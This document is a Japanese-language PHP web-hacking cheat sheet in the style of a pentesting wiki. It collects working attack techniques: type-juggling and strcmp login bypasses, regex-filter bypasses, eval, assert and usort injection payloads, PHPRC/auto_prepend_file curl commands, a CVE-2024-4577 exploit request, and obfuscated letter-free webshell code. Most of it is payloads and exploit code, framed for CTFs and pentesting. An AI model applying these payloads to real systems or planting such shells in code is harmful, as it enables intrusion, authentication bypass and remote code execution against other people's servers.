PHP Tricks

Cookies common location:

これはphpMyAdminのクッキーにも当てはまります。

Cookies:

PHPSESSID
phpMyAdmin

場所:

/var/lib/php/sessions
/var/lib/php5/
/tmp/
Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e

PHPの比較をバイパスする

緩やかな比較/型ジャグリング ( == )

PHPで==が使用されると、比較が期待通りに動作しない予期しないケースがあります。これは「==」が同じ型に変換された値のみを比較するためであり、比較されるデータの型も同じであることを比較したい場合は===を使用する必要があります。

PHP比較表: https://www.php.net/manual/en/types.comparisons.php

• "string" == 0 -> True 数字で始まらない文字列は数字と等しい

• "0xAAAA" == "43690" -> True 10進数または16進数形式の数字で構成された文字列は、数字が同じであれば他の数字/文字列とTrueとして比較できる（文字列内の数字は数字として解釈される）

• "0e3264578" == 0 --> True "0e"で始まり、何かが続く文字列は0と等しい

• "0X3264578" == 0X --> True "0"で始まり、任意の文字（Xは任意の文字）で続き、何かが続く文字列は0と等しい

• "0e12334" == "0" --> True これは非常に興味深いです。なぜなら、場合によっては「0」の文字列入力とそれにハッシュされて比較されるコンテンツを制御できるからです。したがって、「0e」で始まり、任意の文字がない値を提供できれば、比較をバイパスできる可能性があります。この形式のすでにハッシュされた文字列はここで見つけることができます: https://github.com/spaze/hashes

• "X" == 0 --> True 文字列内の任意の文字はint 0と等しい

詳細はhttps://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09を参照してください。

in_array()

型ジャグリングはデフォルトでin_array()関数にも影響を与えます（厳密な比較を行うには、3番目の引数をtrueに設定する必要があります）：

$values = array("apple","orange","pear","grape");
var_dump(in_array(0, $values));
//True
var_dump(in_array(0, $values, true));
//False

strcmp()/strcasecmp()

この関数が任意の認証チェック（パスワードの確認など）に使用されている場合、ユーザーが比較の一方を制御できると、パスワードの値として文字列の代わりに空の配列を送信することができ（https://example.com/login.php/?username=admin&password[]=）、このチェックをバイパスすることができます：

if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password

strcasecmp()を使用しても同じエラーが発生します。

厳密な型のジャグリング

===が使用されている場合でも、比較が脆弱になる型ジャグリングを引き起こすエラーがある可能性があります。たとえば、比較が比較する前にデータを異なる型のオブジェクトに変換している場合です：

(int) "1abc" === (int) "1xyz" //This will be true

preg_match(/^.*/)

preg_match() は ユーザー入力を検証する ために使用できます（それは ブラックリスト の 単語/正規表現 が ユーザー入力 に 存在するか を チェック し、存在しない場合はコードの実行を続けることができます）。

新しい行のバイパス

しかし、正規表現の開始を区切る際に preg_match() は ユーザー入力の最初の行のみをチェック します。したがって、何らかの方法で 複数行 で入力を 送信 できる場合、このチェックをバイパスできる可能性があります。例:

$myinput="aaaaaaa
11111111"; //Notice the new line
echo preg_match("/1/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/1.*$/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/^.*1/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"
echo preg_match("/^.*1.*$/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"

このチェックを回避するには、新しい行をURLエンコードした値を送信するか（%0A）、JSONデータを送信できる場合は、複数行で送信します：

{
"cmd": "cat /etc/passwd"
}

ここに例があります: https://ramadistra.dev/fbctf-2019-rceservice

長さエラーのバイパス

（このバイパスは明らかに PHP 5.2.5 で試され、PHP 7.3.15 では動作しませんでした） preg_match() に有効な非常に 大きな入力 を送信できれば、処理できなくなり、チェックを バイパス できるようになります。たとえば、JSON をブラックリストに登録している場合、次のように送信できます:

payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'

From: https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0

ReDoS バイパス

Trick from: https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223 and https://mizu.re/post/pong

要するに、問題はPHPのpreg_*関数がPCREライブラリに基づいているために発生します。PCREでは、特定の正規表現が多くの再帰呼び出しを使用して一致され、これにより多くのスタックスペースが消費されます。許可される再帰の数に制限を設定することは可能ですが、PHPではこの制限はデフォルトで100,000であり、スタックに収まる以上の数です。

このStackoverflowスレッドも、問題についてより深く語られている投稿にリンクされています。私たちのタスクは明確でした： 正規表現が100,000回以上の再帰を行うような入力を送信し、SIGSEGVを引き起こし、preg_match()関数がfalseを返すようにして、アプリケーションが私たちの入力を悪意のあるものではないと考えさせ、ペイロードの最後に{system(<verybadcommand>)}のような驚きを投げかけてSSTI --> RCE --> フラグを取得することです :)。

さて、正規表現の用語で言えば、実際には100kの「再帰」を行っているわけではなく、「バックトラッキングステップ」を数えています。これはPHPのドキュメントによれば、pcre.backtrack_limit変数でデフォルトで1,000,000（1M）です。 それを達成するために、'X'*500_001は100万のバックトラッキングステップ（50万前進と50万後退）を生成します：

payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"

PHPの難読化のための型ジャグリング

$obfs = "1"; //string "1"
$obfs++; //int 2
$obfs += 0.2; //float 2.2
$obfs = 1 + "7 IGNORE"; //int 8
$obfs = "string" + array("1.1 striiing")[0]; //float 1.1
$obfs = 3+2 * (TRUE + TRUE); //int 7
$obfs .= ""; //string "7"
$obfs += ""; //int 7

Execute After Redirect (EAR)

もしPHPが別のページにリダイレクトしているが、ヘッダーLocationが設定された後に**dieまたはexit関数が呼び出されていない**場合、PHPは実行を続け、データをボディに追加します:

<?php
// In this page the page will be read and the content appended to the body of
// the redirect response
$page = $_GET['page'];
header('Location: /index.php?page=default.html');
readfile($page);
?>

パス・トラバーサルとファイルインクルージョンの悪用

Check:

さらなるトリック

• register_globals: PHP < 4.1.1.1 または誤って設定された場合、register_globals が有効である可能性があります（またはその動作が模倣されています）。これは、グローバル変数のような $_GET に値がある場合、例えば $_GET["param"]="1234" のように、$param を介してアクセスできることを意味します。したがって、HTTP パラメータを送信することで、コード内で使用される変数を上書きできます。

• 同じドメインの PHPSESSION クッキーは同じ場所に保存されます。したがって、ドメイン内で 異なるパスで異なるクッキーが使用されている場合、そのパスが 他のパスのクッキーにアクセスするように設定することができます。 この方法で、両方のパスが同じ名前の変数にアクセスする場合、path1 のその変数の値を path2 に適用させることができます。そして、path2 は path1 の変数を有効と見なします（クッキーに path2 に対応する名前を付けることによって）。

• マシンの ユーザー名 を持っている場合、アドレス /~<USERNAME> を確認して、php ディレクトリが有効になっているかどうかを確認します。

• php ラッパーを使用した LFI と RCE

password_hash/password_verify

この関数は通常、PHP で パスワードからハッシュを生成するため、およびハッシュと比較してパスワードが正しいかどうかを 確認するため に使用されます。 サポートされているアルゴリズムは: PASSWORD_DEFAULT と PASSWORD_BCRYPT（$2y$ で始まります）。PASSWORD_DEFAULT は頻繁に PASSWORD_BCRYPT と同じであることに注意してください。 現在、PASSWORD_BCRYPT には 入力のサイズ制限が 72 バイト あります。したがって、このアルゴリズムで 72 バイトを超えるものをハッシュしようとすると、最初の 72B のみが使用されます:

$cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
False

$cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
True

HTTP ヘッダーのバイパス PHP エラーの悪用

ヘッダーを設定した後のエラーの発生

このツイッターのスレッドから、1000を超えるGETパラメータや1000を超えるPOSTパラメータ、または20ファイルを送信すると、PHPはレスポンスにヘッダーを設定しないことがわかります。

これにより、例えば次のようなコードで設定されているCSPヘッダーをバイパスすることが可能になります:

<?php
header("Content-Security-Policy: default-src 'none';");
if (isset($_GET["xss"])) echo $_GET["xss"];

ヘッダーを設定する前にボディを埋める

もしPHPページがエラーを印刷し、ユーザーが提供した入力をエコーしている場合、ユーザーはPHPサーバーに十分に長いコンテンツを印刷させることができ、サーバーがレスポンスにヘッダーを追加しようとするとエラーを投げることになります。 次のシナリオでは、攻撃者がサーバーに大きなエラーを投げさせました。画面で見ると、PHPがヘッダー情報を修正しようとしたとき、できなかったことがわかります（例えば、CSPヘッダーはユーザーに送信されませんでした）：

PHP関数におけるSSRF

ページを確認してください：

コード実行

system("ls"); `ls`; shell_exec("ls");

こちらをチェックして、より便利なPHP関数を見つけてください

preg_replace()によるRCE

preg_replace(pattern,replace,base)
preg_replace("/a/e","phpinfo()","whatever")

"replace" 引数でコードを実行するには、少なくとも1つの一致が必要です。 この preg_replace のオプションは PHP 5.5.0 以降非推奨です。

Eval() を介した RCE

'.system('uname -a'); $dummy='
'.system('uname -a');#
'.system('uname -a');//
'.phpinfo().'
<?php phpinfo(); ?>

Assert()によるRCE

このphp内の関数は、文字列で書かれたコードを実行することを可能にし、真または偽を返す（これに応じて実行を変更する）。通常、ユーザー変数は文字列の中間に挿入される。例えば： assert("strpos($_GET['page']),'..') === false") --> この場合、RCEを得るためには次のようにすることができる：

?page=a','NeVeR') === false and system('ls') and strpos('a

あなたはコードの構文を 壊し、ペイロードを 追加し、そして再び修正する必要があります。"and"や"%26%26"や"|"のような論理演算子を使用できます。"or"や"||"は機能しないことに注意してください。最初の条件が真である場合、私たちのペイロードは実行されません。同様に、";"も機能しません。なぜなら、私たちのペイロードは実行されないからです。

別のオプションは、文字列にコマンドの実行を追加することです：'.highlight_file('.passwd').'

別のオプション（内部コードがある場合）は、実行を変更するためにいくつかの変数を修正することです：$file = "hola"

usort()を介したRCE

この関数は、特定の関数を使用してアイテムの配列をソートするために使用されます。 この関数を悪用するには：

<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#

<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>

<?php
function foo($x,$y){
usort(VALUE, "cmp");
}?>
VALUE: );}[PHP CODE];#

<?php
function foo($x,$y){
usort();}phpinfo;#, "cmp");
}?>

You can also use // to comment the rest of the code.

To discover the number of parenthesis that you need to close:

• ?order=id;}//: エラーメッセージが表示されます（Parse error: syntax error, unexpected ';'）。おそらく、1つ以上の括弧が不足しています。

• ?order=id);}//: 警告が表示されます。それは正しいようです。

• ?order=id));}//: エラーメッセージが表示されます（Parse error: syntax error, unexpected ')' i）。おそらく、閉じ括弧が多すぎます。

RCE via .httaccess

.htaccessをアップロードできる場合、いくつかの設定を行い、コードを実行することもできます（拡張子が .htaccess のファイルが実行されるように設定すること）。

異なる .htaccess シェルはこちらで見つけることができます。

RCE via Env Variables

PHPのenv変数を変更することを許可する脆弱性を見つけた場合（ファイルをアップロードするための別の脆弱性も必要ですが、さらに調査すればこれを回避できるかもしれません）、この動作を悪用してRCEを取得できます。

• LD_PRELOAD: この環境変数は、他のバイナリを実行する際に任意のライブラリを読み込むことを許可します（ただし、この場合は機能しないかもしれません）。

• PHPRC : PHPに設定ファイルの場所を指示します。通常は php.ini と呼ばれます。独自の設定ファイルをアップロードできる場合は、PHPRCを使用してPHPにそれを指し示します。2つ目のアップロードファイルを指定する**auto_prepend_fileエントリを追加します。この2つ目のファイルには通常のPHPコードが含まれ、PHPランタイムによって他のコードの前に実行されます**。

1. シェルコードを含むPHPファイルをアップロードします。

2. ステップ1でアップロードしたファイルを実行するようPHPプリプロセッサに指示する**auto_prepend_file**ディレクティブを含む2つ目のファイルをアップロードします。

3. ステップ2でアップロードしたファイルにPHPRC変数を設定します。

• このチェーンを実行する方法についての詳細は元のレポートから取得できます。

• PHPRC - 別のオプション

• ファイルをアップロードできない場合、FreeBSDでは**stdinを含む"ファイル" /dev/fd/0を使用できます。これはstdinに送信されたリクエストの本体**です：

• curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

• またはRCEを取得するために、**allow_url_include**を有効にし、base64 PHPコードを含むファイルを前置きします：

• curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

• 技術このレポートから。

XAMPP CGI RCE - CVE-2024-4577

WebサーバーはHTTPリクエストを解析し、http://host/cgi.php?foo=barのようなリクエストを実行するPHPスクリプトに渡します（php.exe cgi.php foo=barとして）。これにより、PHPコードを本体から読み込むためのパラメータ注入が可能になります。

-d allow_url_include=1 -d auto_prepend_file=php://input

さらに、PHPの後の正規化により、0xAD文字を使用して"-"パラメータを注入することが可能です。 この投稿からのエクスプロイトの例を確認してください。

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

PHP サニタイズバイパス & ブレインファック

この記事では 非常に少ない文字でブレインファック PHP コードを生成するための素晴らしいアイデアを見つけることができます。 さらに、いくつかのチェックをバイパスすることを可能にする関数を実行するための興味深い方法も提案されています：

(1)->{system($_GET[chr(97)])}

PHP 静的解析

これらの関数への呼び出しにコードを挿入できるか確認してください（こちらから）：

exec, shell_exec, system, passthru, eval, popen
unserialize, include, file_put_cotents
$_COOKIE | if #This mea

もしPHPアプリケーションをデバッグしている場合は、/etc/php5/apache2/php.iniにdisplay_errors = Onを追加してエラープリンティングをグローバルに有効にし、apacheを再起動します：sudo systemctl restart apache2

PHPコードのデオブフスケーション

PHPコードをデオブフスケートするには、web www.unphp.net を使用できます。

PHPラッパーとプロトコル

PHPラッパーとプロトコルは、システム内の書き込みおよび読み取り保護を回避し、妥協することを可能にする場合があります。詳細についてはこのページを確認してください。

Xdebugの認証されていないRCE

phpconfig()の出力にXdebugが有効であることが表示された場合は、https://github.com/nqxcode/xdebug-exploitを介してRCEを取得しようとしてください。

変数変数

$x = 'Da';
$$x = 'Drums';

echo $x; //Da
echo $$x; //Drums
echo $Da; //Drums
echo "${Da}"; //Drums
echo "$x ${$x}"; //Da Drums
echo "$x ${Da}"; //Da Drums

RCE abusing new $_GET["a"]($_GET["b")

もしページで任意のクラスの新しいオブジェクトを作成できる場合、RCEを取得できるかもしれません。以下のページを確認して学んでください：

Execute PHP without letters

https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/

Using octal

$_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);

XOR

$_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source
$__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd
$___=$__; #Could be not needed inside eval
$_($___); #If ¢___ not needed then $_($__), show_source(.passwd)

XOR easy shell code

According to this writeup 次のようにして簡単なシェルコードを生成することが可能です:

$_="`{{{"^"?<>/"; // $_ = '_GET';
${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);

だから、数字と文字なしで任意のPHPを実行できる場合、次のようなリクエストを送信して、そのペイロードを悪用して任意のPHPを実行できます：

POST: /action.php?_=system&__=cat+flag.php
Content-Type: application/x-www-form-urlencoded

comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);

より詳細な説明については、https://ctf-wiki.org/web/php/php/#preg_matchを確認してください。

XOR Shellcode (eval内)

#!/bin/bash

if [[ -z $1 ]]; then
echo "USAGE: $0 CMD"
exit
fi

CMD=$1
CODE="\$_='\

lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='

lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"

Perlのような

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);